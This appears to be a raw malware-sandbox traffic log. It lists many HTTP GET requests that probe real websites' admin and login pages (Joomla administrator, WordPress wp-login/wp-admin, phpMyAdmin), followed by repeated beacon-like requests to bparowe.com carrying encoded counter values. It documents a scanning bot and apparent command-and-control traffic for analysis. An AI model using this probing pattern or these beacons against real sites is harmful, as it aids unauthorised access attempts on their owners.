                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: elossa.deAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /eshop HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: tsutomu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://tsutomu.com/administrator/
                                Source: global trafficHTTP traffic detected: GET /eshop HTTP/1.1Host: kanapy.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: instalanova.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: aexoden.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: brightright.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://brightright.com/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: janckulik.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: emr.com.arAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: elossa.deAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: elossa.deAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: preda.plAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: instalanova.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://instalanova.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: elossa.deAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://elossa.de/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: predan.itAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: janckulik.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nakacho.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: oitacity.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: oitacity.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nakacho.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: erikamoveis.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://erikamoveis.com.br/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: eurokamen.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: janckulik.skAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=hg0s2enuefjtdt9jcr0vlbien2User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://janckulik.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator HTTP/1.1Host: www.kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: rotas.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: rotas.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: reproma.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: predajpaliet.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: tsutomu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: eurisproagro.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eurokamen.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: s-kotobuki-s.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: kompresory-servis.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: escolapatelli.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: escolapatelli.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: rotas.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://rotas.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: reproma.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://reproma.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: rotas.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://rotas.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://abatek.sk/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://abatek.sk/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://abatek.sk/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: eurisproagro.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://eurisproagro.sk/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: abatek.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://abatek.sk/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: ericrothphoto.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://eshopy-katalog.sk/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://eshopy-katalog.sk/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: e-art-studio.co.jpAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: detmar.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: detmar.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eurokamen.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: e-bicycles.euAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: e-bicycles.euAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: nakacho.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: kingsway-hk.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: escolapatelli.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://escolapatelli.com.br/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: escolapatelli.com.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://escolapatelli.com.br/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: eurokamen.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://eurokamen.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /administrator/ HTTP/1.1Host: st-comet.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: enso-center.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: enso-center.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: keramat.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: enso-center.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://enso-center.org/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: enso-center.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://enso-center.org/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: st-comet.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://st-comet.com/administrator/
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: brightright.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: elossa.deAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: tsutomu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: janckulik.skAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=bdmjpgckhs0bhq2001gh1oo7d2User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://janckulik.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: tsutomu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nakupusa.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: brightright.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nakupusa.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: eshopy-katalog.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: brightright.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://brightright.com/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: tsutomu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://tsutomu.com/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: tsutomu.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://tsutomu.com/wp-login.php
                                Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: keramat.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://keramat.sk/administrator/
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e2f834798823d2b6c47a7377425879a663bdccd82385b558fd807fa10cadd5a HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1Host: bparowe.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
